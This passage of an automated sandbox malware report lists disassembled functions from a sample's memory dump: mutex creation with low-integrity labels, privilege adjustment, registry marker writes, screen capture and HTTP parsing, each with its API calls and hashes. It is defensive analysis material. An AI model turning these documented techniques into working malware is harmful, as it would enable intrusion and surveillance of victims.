                                                                                                                                                                                                              • API String ID: 731183410-1167384825
                                                                                                                                                                                                              • Opcode ID: bb83e78b5dbe67d9122c501c0f38c4270613c06f8e80ecc670050c1f151b8206
                                                                                                                                                                                                              • Instruction ID: c838a109481a697cfd9bf782ee65ba0268eb6451125722368d2a72f4467f4d60
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bb83e78b5dbe67d9122c501c0f38c4270613c06f8e80ecc670050c1f151b8206
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 82110831651318ABE730EFA4DC0DFEA37ECAF15711F504168FA08AB2C5C7B066018B94
                                                                                                                                                                                                              Function 012E3570 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52synchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,9E2B3C2Da,?,?,012E3751), ref: 012E357F
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,012E3751), ref: 012E35ED
                                                                                                                                                                                                                • Part of subcall function 01305930: GetCurrentThread.KERNEL32(00000020,00000000,012E358E,75C8DB30,?,?,?,?,012E358E,?,?,012E3751), ref: 01305940
                                                                                                                                                                                                                • Part of subcall function 01305930: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,012E358E,?,?,012E3751), ref: 01305947
                                                                                                                                                                                                                • Part of subcall function 01305930: GetCurrentProcess.KERNEL32(00000020,012E358E,?,?,?,?,012E358E,?,?,012E3751), ref: 01305957
                                                                                                                                                                                                                • Part of subcall function 01305930: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,012E358E,?,?,012E3751), ref: 0130595E
                                                                                                                                                                                                                • Part of subcall function 01305930: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 01305981
                                                                                                                                                                                                                • Part of subcall function 01305930: AdjustTokenPrivileges.ADVAPI32(012E358E,00000000,00000001,00000000,00000000,00000000), ref: 0130599B
                                                                                                                                                                                                                • Part of subcall function 01305930: GetLastError.KERNEL32 ref: 013059A5
                                                                                                                                                                                                                • Part of subcall function 01305930: CloseHandle.KERNEL32(012E358E), ref: 013059B6
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,012E3751,00000000), ref: 012E359F
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(012E3751,?,?,?,?,?,012E3751), ref: 012E35C0
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(9E2B3C2Da,00000006,00000010,00000000,00000000,00000000,00000000), ref: 012E35DD
                                                                                                                                                                                                              • LocalFree.KERNEL32(012E3751,?,?,012E3751), ref: 012E35E7
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Security$DescriptorToken$CurrentErrorLastOpenProcessThread$AdjustCloseConvertCreateFreeHandleInfoLocalLookupMutexNamedPrivilegePrivilegesSaclStringValue
                                                                                                                                                                                                              • String ID: 9E2B3C2Da$S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                              • API String ID: 291819237-2338183320
                                                                                                                                                                                                              • Opcode ID: 1f75c292a3509bd459c2f2373195249503b61b58c10b0a9755026e5937cef06f
                                                                                                                                                                                                              • Instruction ID: 2dad60536998d35bc28ed20a8b21f814bd4cda60a7322b40394f5731c3e4d025
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1f75c292a3509bd459c2f2373195249503b61b58c10b0a9755026e5937cef06f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F1018471750205BBEB30EFA59C4AFAD77ECAB44B01F504058F705E61C0D6B0A600C765
                                                                                                                                                                                                              Function 012FA140 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 39registryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • #680.SHELL32(?,?,012FA33F), ref: 012FA147
                                                                                                                                                                                                              • GetTickCount.KERNEL32(?,012FA33F), ref: 012FA159
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(?,software\microsoft,00000000,00000102,012FA33F,?,012FA33F), ref: 012FA173
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(012FA33F,9e2b3f9ba,00000000,00000004,00000004,00000004,012FA33F), ref: 012FA190
                                                                                                                                                                                                              • RegFlushKey.ADVAPI32(?), ref: 012FA19A
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 012FA1A4
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: #680CloseCountFlushOpenTickValue
                                                                                                                                                                                                              • String ID: 9e2b3f9ba$software\microsoft
                                                                                                                                                                                                              • API String ID: 1556939811-410439933
                                                                                                                                                                                                              • Opcode ID: 627343e544edf9538b1790a982a03219c361e461d16323cac843e302b0436cc8
                                                                                                                                                                                                              • Instruction ID: 32108fe12428d935cd4d1ca0538514110480b5de0a2dbe955177a4ba64d25c87
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 627343e544edf9538b1790a982a03219c361e461d16323cac843e302b0436cc8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1CF04F75991218FBD720BFA4DD4AEEE777CAB04702F104148FA01E6284D6756B008BE5
                                                                                                                                                                                                              Function 012E3500 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 39registryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • #680.SHELL32 ref: 012E3507
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 012E3519
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(?,software\microsoft,00000000,00000102,?), ref: 012E3533
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,9e2b3e09a,00000000,00000004,?,00000004,software\microsoft,00000000,00000102,?), ref: 012E3550
                                                                                                                                                                                                              • RegFlushKey.ADVAPI32(?), ref: 012E355A
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 012E3564
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: #680CloseCountFlushOpenTickValue
                                                                                                                                                                                                              • String ID: 9e2b3e09a$software\microsoft
                                                                                                                                                                                                              • API String ID: 1556939811-554794888
                                                                                                                                                                                                              • Opcode ID: 91a2d141a3757cb892669b93febfa7dc2ae99c725c8a7a46c443ad0e610225d6
                                                                                                                                                                                                              • Instruction ID: 3ed9d9d06400c0e4449cfbe9e89aed60587e00245db5aff5cfc0a162427e88b6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 91a2d141a3757cb892669b93febfa7dc2ae99c725c8a7a46c443ad0e610225d6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 71F0FF75981218FBD720EFA4DD4AEEE777CAB04B06F504158FA01E6284D6756B0087E5
                                                                                                                                                                                                              Function 012EF000 Relevance: 13.7, APIs: 1, Strings: 8, Instructions: 247COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • StrCmpNIA.SHLWAPI(00000001,?,00000000), ref: 012EF0CD
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: $Connection$Content-Length$HTTP/1.$Proxy-Connection$Transfer-Encoding$chunked$close
                                                                                                                                                                                                              • API String ID: 0-1412996494
                                                                                                                                                                                                              • Opcode ID: 653072bc824b0454de47cd0bdd1de96adc4e094380bc493ab5c11cf561a7e9e5
                                                                                                                                                                                                              • Instruction ID: 9162ed975800378bb76cbfdb50be7a7f931829cb5cbb23e534f30239c5a4067a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 653072bc824b0454de47cd0bdd1de96adc4e094380bc493ab5c11cf561a7e9e5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EE714531B20217AFEF21CE6CCA487BA7FE99B51218F948429EB45DB245F631D9018790
                                                                                                                                                                                                              Function 012E29A0 Relevance: 13.7, APIs: 9, Instructions: 198COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • calloc.MSVCRT(00000000,00000004,?,00000000,00000000,00000000,?,?,?), ref: 012E29B7
                                                                                                                                                                                                              • exit.MSVCRT(00000001), ref: 012E29C5
                                                                                                                                                                                                              • calloc.MSVCRT(00000000,00000004), ref: 012E29CE
                                                                                                                                                                                                              • exit.MSVCRT(00000001), ref: 012E29DC
                                                                                                                                                                                                              • calloc.MSVCRT(00000000,00000004), ref: 012E29E5
                                                                                                                                                                                                              • exit.MSVCRT(00000001), ref: 012E29F2
                                                                                                                                                                                                              • free.MSVCRT(?), ref: 012E2B41
                                                                                                                                                                                                              • free.MSVCRT(?), ref: 012E2B69
                                                                                                                                                                                                              • free.MSVCRT(00000000), ref: 012E2B85
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: callocexitfree
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3367576030-0
                                                                                                                                                                                                              • Opcode ID: 77452be7320ef73953a0abe904556baa5145b3a97a6d52c9982de2262e8a9c4a
                                                                                                                                                                                                              • Instruction ID: 72bd7496c58b9baf0ac5e568e35dfda72c402737d8a910f43a723d2ae89b5cb4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 77452be7320ef73953a0abe904556baa5145b3a97a6d52c9982de2262e8a9c4a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F7618075A1060AEFDB20DF58C884BAE7BF8FF48750F544458EA0697345E770EA41CBA0
                                                                                                                                                                                                              Function 012E9340 Relevance: 13.6, APIs: 9, Instructions: 52synchronizationsleepthreadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetThreadDesktop.USER32(?), ref: 012E9350
                                                                                                                                                                                                                • Part of subcall function 012E8F20: SelectObject.GDI32(00000000,?,?,00000000,774D3080,012E9231,?,00000006,00000000), ref: 012E8F3A
                                                                                                                                                                                                                • Part of subcall function 012E8F20: DeleteObject.GDI32(?), ref: 012E8F49
                                                                                                                                                                                                                • Part of subcall function 012E8F20: DeleteDC.GDI32(00000000), ref: 012E8F57
                                                                                                                                                                                                                • Part of subcall function 012E8F20: SelectObject.GDI32(?,?), ref: 012E8F67
                                                                                                                                                                                                                • Part of subcall function 012E8F20: DeleteObject.GDI32(?), ref: 012E8F6F
                                                                                                                                                                                                                • Part of subcall function 012E8F20: DeleteDC.GDI32(?), ref: 012E8F78
                                                                                                                                                                                                                • Part of subcall function 012E8F20: GetDC.USER32(00000000,?,00000000,774D3080,012E9231,?,00000006,00000000), ref: 012E8F7C
                                                                                                                                                                                                                • Part of subcall function 012E8F20: CreateCompatibleDC.GDI32(00000000), ref: 012E8F8B
                                                                                                                                                                                                                • Part of subcall function 012E8F20: CreateCompatibleDC.GDI32(00000000), ref: 012E8F93
                                                                                                                                                                                                                • Part of subcall function 012E8F20: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 012E8FB4
                                                                                                                                                                                                                • Part of subcall function 012E8F20: SelectObject.GDI32(?,00000000), ref: 012E8FC3
                                                                                                                                                                                                                • Part of subcall function 012E8F20: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 012E8FDE
                                                                                                                                                                                                                • Part of subcall function 012E8F20: SelectObject.GDI32(00000000,00000000,00000000,01339EB0), ref: 012E8FFD
                                                                                                                                                                                                                • Part of subcall function 012E8F20: ReleaseDC.USER32(00000000,00000000), ref: 012E900C
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000001F4), ref: 012E937C
                                                                                                                                                                                                              • GetTopWindow.USER32(00000000), ref: 012E938B
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 012E939E
                                                                                                                                                                                                              • GetWindow.USER32(?,00000005,00000001), ref: 012E93B4
                                                                                                                                                                                                              • GetWindow.USER32(00000000), ref: 012E93B7
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000,00000000), ref: 012E93C6
                                                                                                                                                                                                              • SetEvent.KERNEL32(00000000), ref: 012E93CF
                                                                                                                                                                                                              • Sleep.KERNEL32(00000032), ref: 012E93DB
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Object$CompatibleCreateDeleteSelect$Window$BitmapReleaseSingleWait$DesktopEventMutexSleepThread
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4064958368-0
                                                                                                                                                                                                              • Opcode ID: 9004aadda26ed4348d17e8b23b5ef6570df4dae31868a5df1c6a3c289a376108
                                                                                                                                                                                                              • Instruction ID: 1fcf2c683d7149916cfef7ee749d1c683072c012278ffc3acf38488728943104
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9004aadda26ed4348d17e8b23b5ef6570df4dae31868a5df1c6a3c289a376108
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 321184B5528306ABCA30BFB5EC4DE5B37ACAB54325F00561DF215872C8DA75E900CBB0
                                                                                                                                                                                                              Function 012E8820 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90synchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GdiFlush.GDI32 ref: 012E88B6
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 012E88C4
                                                                                                                                                                                                              • IsBadWritePtr.KERNEL32(?,?), ref: 012E88DA
                                                                                                                                                                                                              • IsBadReadPtr.KERNEL32(00000000,?), ref: 012E88E6
                                                                                                                                                                                                              • memcpy.MSVCRT(?,00000000,?), ref: 012E88F3
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 012E8915
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FlushMutexObjectReadReleaseSingleWaitWritememcpy
                                                                                                                                                                                                              • String ID: P0Mw
                                                                                                                                                                                                              • API String ID: 3485819771-1167384825
                                                                                                                                                                                                              • Opcode ID: 726a21bd6ef5ebccb8bb178e6acfe098c73a886f5ae5f34e3c835d6c0007dab4
                                                                                                                                                                                                              • Instruction ID: 055fa822a4d81c0646516910be631fdafdf2fb9b928ac7acba2e3b5ab9f3816a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 726a21bd6ef5ebccb8bb178e6acfe098c73a886f5ae5f34e3c835d6c0007dab4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0831C735A102099FCB20DF69D988AAA7BFEAF84754F24816DED489B345D730D9018BA0
                                                                                                                                                                                                              Function 012F5AF0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 51registryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • #680.SHELL32(software\microsoft,00000000,00020119,?), ref: 012F5B18
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,9e2b38eea,00000000,?,00000000,?), ref: 012F5B5A
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 012F5B64
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(-80000001), ref: 012F5B2A
                                                                                                                                                                                                                • Part of subcall function 012E3420: #680.SHELL32 ref: 012E3428
                                                                                                                                                                                                                • Part of subcall function 012E3420: RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?), ref: 012E345F
                                                                                                                                                                                                                • Part of subcall function 012E3420: RegQueryValueExA.ADVAPI32(?,9e2b3e09a,00000000,?,00000000,?), ref: 012E347C
                                                                                                                                                                                                                • Part of subcall function 012E3420: RegCloseKey.ADVAPI32(?), ref: 012E3486
                                                                                                                                                                                                                • Part of subcall function 012E3420: RegOpenKeyExA.ADVAPI32(80000002,software\microsoft,00000000,00000101,?), ref: 012E34B9
                                                                                                                                                                                                                • Part of subcall function 012E3420: RegQueryValueExA.ADVAPI32(?,9e2b3e09a,00000000,?,00000000,?), ref: 012E34D6
                                                                                                                                                                                                                • Part of subcall function 012E3420: RegCloseKey.ADVAPI32(?), ref: 012E34E0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseOpenQueryValue$#680
                                                                                                                                                                                                              • String ID: 9E2B3757a$9e2b38eea$software\microsoft
                                                                                                                                                                                                              • API String ID: 1151197818-1035421039
                                                                                                                                                                                                              • Opcode ID: 65fffda011e86e2d8b71ab748a13139a1b2c13807872d054ef93375e861c0e03
                                                                                                                                                                                                              • Instruction ID: f0c0bf1fb4baed581ab7254ab340fb993bbe369e6dafa7d105628ffb7b69df72
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 65fffda011e86e2d8b71ab748a13139a1b2c13807872d054ef93375e861c0e03
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 18014075A5020EABDB20EEB8CC45FFEB7BCBB14705F404658F615E7284E67896048BA0
                                                                                                                                                                                                              Function 012EBAA1 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46synchronizationthreadwindowCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 012EBAAF
                                                                                                                                                                                                              • IsWindow.USER32(?), ref: 012EBAD4
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 012EBAE2
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32 ref: 012EBB17
                                                                                                                                                                                                              • IsWindow.USER32(?), ref: 012EBB1E
                                                                                                                                                                                                              • SendMessageA.USER32(?,00000215,00000000,00000000), ref: 012EBB2E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$CurrentMessageMutexObjectReleaseSendSingleThreadWait
                                                                                                                                                                                                              • String ID: P0Mw
                                                                                                                                                                                                              • API String ID: 1675675969-1167384825
                                                                                                                                                                                                              • Opcode ID: 8c391039a0b3efdd48549529da5acd4c810b33954ab81a20ea08b1515d34947c
                                                                                                                                                                                                              • Instruction ID: 99ce6bef9b91043dc4f80923a4a0cd7e468306303502c4ec14230da50a6deea0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8c391039a0b3efdd48549529da5acd4c810b33954ab81a20ea08b1515d34947c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4901F5312052119BD734AF24E80CFD977A8BF45725F5542BDEA019F289D3B159038F90
                                                                                                                                                                                                              Function 01301930 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 34synchronizationsleepCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}), ref: 0130193E
                                                                                                                                                                                                                • Part of subcall function 013059D0: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 013059EE
                                                                                                                                                                                                                • Part of subcall function 013059D0: GetSecurityDescriptorSacl.ADVAPI32(?,?,00000001,012E4C50,?,?,012E4C50,?,00000001), ref: 01305A0B
                                                                                                                                                                                                                • Part of subcall function 013059D0: SetNamedSecurityInfoA.ADVAPI32(?,012E4C50,00000010,00000000,00000000,00000000,00000001), ref: 01305A26
                                                                                                                                                                                                                • Part of subcall function 013059D0: LocalFree.KERNEL32(?,?,?,012E4C50,?,00000001), ref: 01305A37
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,Local\{BE3C9D87-B777-4e47-8B10-69798A04C732},00000006), ref: 0130195B
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 01301962
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 01301974
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 01301985
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Security$Descriptor$HandleMutex$CloseConvertCreateFreeInfoInformationLocalNamedReleaseSaclSleepString
                                                                                                                                                                                                              • String ID: Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}$P0Mw
                                                                                                                                                                                                              • API String ID: 1370207991-373936526
                                                                                                                                                                                                              • Opcode ID: 422561cd0c389765f6e97ef4d87eda6523a5c9328ed96b0eeb9ca08cec9b2d17
                                                                                                                                                                                                              • Instruction ID: 9699867b8ff83ead67ca55f2f55f9b1361c8a548164032dbb5c70953de48880c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 422561cd0c389765f6e97ef4d87eda6523a5c9328ed96b0eeb9ca08cec9b2d17
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8EF0E230A52324B7E7327FA99C0EB9FBAEC9F06B19F040158F905A61C0DBE08B0047E1
                                                                                                                                                                                                              Function 012FB980 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 33synchronizationsleepCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}), ref: 012FB98E
                                                                                                                                                                                                                • Part of subcall function 013059D0: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 013059EE
                                                                                                                                                                                                                • Part of subcall function 013059D0: GetSecurityDescriptorSacl.ADVAPI32(?,?,00000001,012E4C50,?,?,012E4C50,?,00000001), ref: 01305A0B
                                                                                                                                                                                                                • Part of subcall function 013059D0: SetNamedSecurityInfoA.ADVAPI32(?,012E4C50,00000010,00000000,00000000,00000000,00000001), ref: 01305A26
                                                                                                                                                                                                                • Part of subcall function 013059D0: LocalFree.KERNEL32(?,?,?,012E4C50,?,00000001), ref: 01305A37
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014},00000006), ref: 012FB9AB
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 012FB9B2
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 012FB9C4
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012FB9D5
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
